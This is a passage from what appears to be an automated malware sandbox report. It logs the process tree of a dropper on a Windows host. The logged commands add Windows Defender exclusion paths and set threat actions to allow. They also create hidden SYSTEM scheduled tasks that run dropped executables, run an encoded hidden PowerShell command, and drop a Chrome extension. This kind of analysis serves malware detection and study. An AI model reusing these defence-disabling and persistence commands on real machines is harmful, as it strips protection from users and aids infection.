(x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5888
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4388
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6248
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4968
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gKoiDTsmx" /SC once /ST 00:00:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:6032
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gKoiDTsmx"
  2⤵
  PID:1700
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gKoiDTsmx"
  2⤵
  PID:4212
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:00:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JkNVuim.exe\" GH /IjxxdidaJ 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:2676
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:6672

C:\Users\Admin\AppData\Local\Temp\7zS1AD6.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS1AD6.tmp\Install.exe it /NjUdidkyuY 385118 /S
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4208
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6172
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6312
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6476
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5476
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5564
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5552
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:6360
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5400
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4124
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6300
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:6180
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6224
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5492
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4116
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6604
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5232
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5292
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6728
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6448
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:00:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\Oyazleo.exe\" GH /PgmYdidhW 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:1324
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:4832

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
PID:5616

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5404
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:6648

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:7152

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5396

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JkNVuim.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\JkNVuim.exe GH /IjxxdidaJ 385118 /S
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5320
- C:\Windows\SysWOW64\cmd.exe
